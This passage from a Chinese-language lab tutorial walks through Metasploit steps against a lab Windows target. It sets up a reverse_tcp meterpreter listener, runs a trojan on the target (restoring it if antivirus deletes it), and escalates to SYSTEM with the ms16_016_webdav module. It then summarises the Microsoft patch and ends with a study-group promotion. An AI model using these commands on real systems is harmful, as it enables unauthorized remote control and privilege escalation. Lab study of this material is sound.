步骤05、
使用 use /exploit/multi/handler
命令调用监听模块,同时使用 set payload windows/meterpreter/reverse_tcp
命令,设置本地监听的地址 192.168.254.134,设置监听端口 8888,最后使用 show options
命令查看最终的配置,如图所示。
查看配置参数 (端口号要与生成木马的端口号一致)
使用 run
或者 exploit
开启监听模式
运行溢出模块
步骤06、
将步骤3 中创建的木马文件复制到靶机中。复制过程中如果木马文件被安全软件删除,恢复即可。再运行木马,运行结束后,渗透机将会获得一个 meterpreter 会话,如图所示。
在靶机中打开 木马程序运行
获得 session 会话
步骤07、
使用 shell
命令启动 Meterpreter 下 cmd 的 Shell 终端,如图所示。
获取操作系统的 Shell
使用 whoami
命令查看当前的系统权限,如图所示。
查看用户权限
步骤08、
使用 background
命令将会话置于后台,会话编号为 1,如图所示。
exit 退出 Shell 终端
步骤09、
使用 use exploit/windows/local/ms16_016_webdav
命令调用漏洞利用模块,同时使用 set SESSION
命令设置刚才获得权限的会话,使用 set LPORT
命令设置载荷模块的监听的本地端口,然后使用 run
或者 exploit
命令运行该模块,如图所示。
使用 ms16_016_webdav 模块,将会话进入高权限进程
使用 ms16_016_webdav 模块,将会话注入高权限进程,执行结果可知会话被成功注入 “1628” 进程,如图所示。
获取注入的进程号
步骤10、
使用 set sessions
重新进入会话,如图所示。
进入注入进程,进程号为2720
步骤11、
使用 shell
命令启动 Meterpreter 下 cmd 的 Shell 终端,查看获取的会话权限,如图所示
会话的权限为 “system” , 即为系统权限,提升权限成功
3 MS16_016 安全加固
步骤12、
此安全更新可解决 Microsoft Windows 中的漏洞。 如果攻击者使用 Microsoft Web 分布式创作和版本控制(WebDAV)客户端将专门制作的输入发送到服务器,则漏洞可能会允许提升特权。
对于 Windows Vista、Windows Server 2008、Windows 7 和 Windows Server 2008 R2,以及 Windows 8.1、Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1 和 Windows 10,此安全更新的评分为重要。 有关详细信息,请参阅 “受影响的软件 ”部分。
安全更新通过更正 WebDAV 验证内存的方式来解决漏洞。 有关漏洞的详细信息,请参阅 “漏洞信息 ”部分。
官方安全公告
写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!